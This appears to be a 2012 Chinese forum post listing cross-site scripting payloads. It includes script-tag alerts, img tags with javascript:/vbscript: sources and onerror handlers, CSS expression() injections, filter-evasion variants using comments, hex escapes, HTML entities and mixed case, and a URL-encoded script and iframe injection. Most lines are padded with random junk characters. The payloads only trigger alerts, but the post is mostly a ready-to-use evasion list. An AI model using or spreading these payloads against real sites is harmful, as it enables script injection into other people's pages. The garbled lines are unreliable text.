<script>alert("跨站")</script> (最常用)+ k6 M) E$ D' x
<img scr=javascript:alert("跨站")></img>, L" w* K+ M5 h& B5 E4 r
<img scr="javascript: alert(/跨站/)></img>1 F' P4 k5 t/ M9 t
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
" s6 _4 G! `' E# F# b2 y* P<img scr="#" onerror=alert(/跨站/)></img>
) o$ {+ u4 N3 A- y! f<img scr="#" style="xss:expression(alert(/xss/));"></img>
2 k% V0 N0 t$ K# a$ Z7 o<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
& D0 E6 I4 S0 r# W- P% j& j<img src=vbscript:msgbox ("xss")></img>
, C; [$ w/ W+ b- O<style> input {left:expression (alert('xss'))}</style>
" t* Q; d, O; z! P# D<div style={left:expression (alert('xss'))}></div>
- j6 Y, Y4 c: a+ x; {<div style={left:exp/* */ression (alert('xss'))}></div>% Q) y7 e) Z1 v4 @ K; a0 l5 T
<div style={left:\0065\0078ression (alert('xss'))}></div>, B) `7 K& ?1 \$ E/ M( i1 \8 f, F
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>6 f" v, V. D7 W
unicode <div style="{left:expRessioN (alert('xss'))}">
6 |' W4 S2 `. _, P Q' ^0 e/ s8 ~# B7 K+ u; ~8 Q$ k- m
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
% J0 N) l; Z& `# o6 w8 D |
发表于 2012-9-15 14:09:13
收藏
支持
反对